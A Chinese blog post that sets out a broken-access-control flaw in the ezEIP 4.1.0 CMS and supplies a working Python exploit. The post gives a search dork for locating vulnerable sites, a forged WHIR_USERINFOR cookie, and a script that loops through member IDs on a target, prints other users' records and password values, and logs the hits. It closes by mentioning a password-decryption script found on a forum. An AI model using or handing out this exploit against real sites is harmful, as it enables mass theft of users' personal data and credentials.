ezEIP4.1.0越权访问导致信息泄露
首页 > 漏洞    作者:Iamyc   2021年4月14日 9:29 星期三   热度:120°   百度已收录  
时间:2021-4-14 9:29   热度:120° 

一、版本

+=============oOO====(_)================+ 

| Powered By wanhu - www.wanhu.com.cn | 

| Tel:400-888-0035 020-85575672 | 

| Creation:2015.06.27 | 

| ezEip v4.1.0 | 

+==========================oOO==========+ 

二、开发环境

aspxasp.netiis

三、Google语法

powered by wanhu

或者直接去fofa、zoomeye里面找

四、利用payload

1、访问http://**.com/label/member/getinfo.aspx返回[]表示该文件存在

2、重新刷新访问,并添加cookie

WHIR_USERINFOR=whir_mem_member_pid=1;

3、可以写个脚本遍历pid参数,因为有些用户信息不是从1开始,比如我找到一个是从第75开始的

Key11239那个是密码,但是不知道啥加密,反正像base64但不是。

五、exp

python3 yc_ezeip.py -u http://*.com



import requests
import os
import sys
import getopt
headers22 = {
    "Cookie": "WHIR_USERINFOR=loginname=test321&realname=root&whir_mem_member_pid=2&password=PmYd5JaQD0ltYOrrPNm6WA%3d%3d&gradeid=8&groupid=2;"
}
headers33 ={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
  "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "Accept-Language" : "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
  "Connection" : "keep-alive",
  "Accept-Charset" : "GB2312,utf-8;q=0.7,*;q=0.7"}
requests.adapters.DEFAULT_RETRIES = 5 
i = 0
#fp = open('url.txt','r')
#lists = fp.readlines()

def exp(url):
    x = url
    print("["+str(i)+"]Test %s"%str(x))
    
    url = x+"/label/member/getinfo.aspx"

    print("[*]getinfo.aspx exists!")
    for xx in range(-100,10000):
        headers = {
        "User-Agent" : "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language" : "en-us",
"Connection" : "keep-alive",
"Accept-Charset" : "GB2312,utf-8;q=0.7,*;q=0.7",
"Cookie": "WHIR_USERINFOR=loginname=test321&realname=root&whir_mem_member_pid="+str(xx)+"&password=PmYd5JaQD0ltYOrrPNm6WA%3d%3d&gradeid=8&groupid=2;"
}  
        print("[*]Trying %s"%str(xx))
        html2 = requests.get(url,headers=headers)
        if len(html2.text)>3 and "Key" in html2.text:
            print("[+]Vul is exists>>%s"%str(x))
            print(str(html2.text))
            
            try:
                ff = open('success.txt','a')
                ff.write(str(x)+"|pid="+str(xx)+"\n")
            except:
                pass
            finally:
                ff.close()
            
            #break
            
        else:
            pass


'''
for x in lists:
    i = i+1
    x = x.replace("\n","")
'''
if __name__ == '__main__':
    url = None
    filename = None
    argv = sys.argv[1:]
    try:
        opts,args = getopt.getopt(argv,"u:")
    except:
        print("python yc_ezeip.py -u http://site")
        print("python yc_ezeip.py -f url.txt")
        
    for opt,arg in opts:
        if opt in ['-u']:
            url = arg
            exp(url)
        elif opt in ['-f']:
            filename = arg
                
                



20210420补充:前两天在土司更好看到有个哥么,在发ezEIP密码解密脚本,我试了下,真能解密,哇哈哈哈!

顺便花50tubi买了源码,俺要审计啦














二维码加载中...
本文作者:Iamyc      文章标题: ezEIP4.1.0越权访问导致信息泄露
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=157
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog